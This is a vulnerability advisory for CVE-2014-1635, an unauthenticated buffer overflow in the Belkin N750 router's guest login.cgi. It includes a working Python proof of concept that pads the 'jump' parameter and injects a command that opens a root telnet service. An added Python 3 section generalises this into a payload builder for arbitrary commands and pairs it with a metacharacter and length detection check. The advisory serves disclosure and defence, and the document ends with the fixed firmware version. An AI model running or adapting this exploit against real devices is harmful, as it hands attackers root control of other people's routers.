CVE-2014-1635 Belkin N750 Buffer Overflow

1. Vulnerability Properties

Title: Belkin n750 buffer overflow

CVE ID: CVE-2014-1635

CVSSv2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Vendor: BELKIN (http://www.belkin.com/)

Products: n750/F9K1103

Advisory Release Date:  2014-11-04

Advisory URL:  https://labs.integrity.pt/advisories/CVE-2014-1635/

Credits: Discovery and PoC by Marco Vaz <mv[at]integrity.pt>

 

2. Vulnerability Summary

A remote, unauthenticated attacker may execute arbitrary commands as root by sending a crafted POST request to login.cgi on the httpd that handles authentication for the guest network. No credentials are required: the overflow is triggered before the login is checked.

3. Technical Details

The vulnerability can be confirmed by sending a crafted POST request in which the parameter "jump" carries 1379 bytes of padding followed by the commands to be executed. The padding must consist of non-zero bytes: it overruns the buffer and overwrites an internal control variable, after which the commands appended to the padding are executed by the router.

The following POC code can be used to verify the vulnerability:

#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
#Tested on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)
# Python 2 (httplib). Run from a host on the guest network; on success the
# router starts utelnetd and a telnet service becomes reachable on it.

import httplib

headers = {}
# 1379 non-zero padding bytes overflow the "jump" buffer and overwrite the
# control variable; the URL-encoded ';' (%3b) then separates the rest of the
# value into a command that the router executes as root.
body= "GO=&jump="+ "a"*1379 +"%3b"+ "/usr/sbin/utelnetd -d" +"%3b&pws=\n\n"
# The guest-network httpd listens on 192.168.169.1:8080 (see Technical Details).
conn = httplib.HTTPConnection("192.168.169.1",8080)
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data
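The following is an added example, written for this edit in Python 3; it is not part of the Integrity Labs advisory and not Belkin firmware code. It models the request structure described in Technical Details (1379 bytes of non-zero padding, a URL-encoded ';' separator, then the command) as a parameterised builder, and pairs it with a server-side or log-review check that flags such bodies before they reach a buffer copy. The padding length and the %3b separator come from the advisory; the function names, the 255-byte "sane redirect length" threshold and the metacharacter list are assumptions chosen for illustration.

```python
from urllib.parse import parse_qs

# Padding length from the advisory: 1379 non-zero bytes precede the injected
# command in the "jump" parameter.
PAD_LEN = 1379

# Shell metacharacters that have no business in a login redirect target
# (assumed list for the detection check, not a value from the firmware).
SHELL_META = frozenset(";|&`$\n")


def build_login_body(command, pad_byte="a"):
    """Build the crafted login.cgi body described in the advisory.

    The ';' is sent URL-encoded (%3b) so that the CGI decodes it into a
    command separator only after the value has been copied past the end
    of the buffer.  A zero byte would terminate the copy early and never
    reach the control variable, so it is rejected here.
    """
    if len(pad_byte) != 1 or pad_byte == "\x00":
        raise ValueError("padding must be a single non-zero byte")
    return "GO=&jump=" + pad_byte * PAD_LEN + "%3b" + command + "%3b&pws=\n\n"


def inspect_login_request(body, max_jump=255):
    """Classify a login.cgi POST body.

    Returns a list of findings; an empty list means the body looks benign.
    max_jump is an assumed upper bound for a legitimate redirect path, not a
    limit taken from the router.  Decoding happens first (as the CGI would do
    it), so an encoded %3b is caught just like a literal ';'.
    """
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for value in params.get("jump", []):
        if len(value) > max_jump:
            findings.append("jump length %d exceeds %d" % (len(value), max_jump))
        bad = sorted(SHELL_META & set(value))
        if bad:
            findings.append("jump contains shell metacharacters %r" % "".join(bad))
    return findings


if __name__ == "__main__":
    # Constructed sample inputs: the advisory's payload and a normal login.
    crafted = build_login_body("/usr/sbin/utelnetd -d")
    benign = "GO=&jump=index.html&pws=secret"
    for name, body in (("crafted", crafted), ("benign", benign)):
        print(name, inspect_login_request(body) or "clean")
```

The check deliberately runs on the decoded value: a filter that looked at the raw body for a literal ';' would miss the %3b form the PoC uses, which is exactly the kind of gap that lets a request like this past a naive blocklist.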

4. Vulnerable Versions

Confirmed on Belkin n750 F9K1103_WW_1.10.16m.

5. Solution

Upgrade to Belkin n750 F9K1103_WW_1.10.17m.

6. Vulnerability Timeline

24 Jan 2014 – Reported to Vendor

28 Jan 2014 – Sent POC code

31 Mar 2014 – Vendor released new firmware version (F9K1103_WW_1.10.17m)